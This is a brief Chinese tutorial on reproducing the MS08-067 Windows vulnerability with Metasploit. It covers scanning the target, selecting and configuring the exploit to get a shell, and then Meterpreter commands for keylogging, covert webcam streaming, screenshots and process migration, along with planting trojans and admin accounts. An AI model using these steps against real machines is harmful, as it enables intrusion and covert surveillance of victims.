Metasploit工具漏洞利用MS08-067

MS08-067漏洞复现

• 收集靶机信息
• 开始渗透
• 后渗透命令
• 相关命令

收集靶机信息

通过Nmap和Nessus收集靶机的IP，Nessus扫描是否存在漏洞

开始渗透

1. 进入metasploit工具/普通终端输入msfconsle进入
2. 测试渗透主机kali到靶机的连通性（ping）
3. 找到kali后台针对ms08-067的漏洞利用（exploit）

search ms08-067

4. 利用漏洞

use 路径

5. 查看利用漏洞需要配置的参数：show options
6. 设置必要参数：lhost本机IP，rhost目标靶机IP，lport本机端口

set lhost/rhost/lport/rport

7. 执行exploit获取用户的控制权限，拿到shell，也可使用run。
   

后渗透命令

• 获取shell之后，就是后渗透阶段了，可以查看靶子机电脑信息，复制他的文件，上传木马，也可以创建管理员账户，或者是开启端口3389（开启远程桌面）
• 或者可以侦听键盘，监视桌面，偷偷开启摄像头等

相关命令

• 开启摄像头：webcam_stream
• 查看进程号：tasklist
• 切换进程：migrate + 进程号
• 开启键盘记录：keyscan_start
• 显示键盘记录：keyscan_dump
• 屏幕截图：use espia
• 查看截图：screengrab 还有很多后渗透命令，所以说，网络安全与生活息息相关，在透明的互联网上网络安全非常重要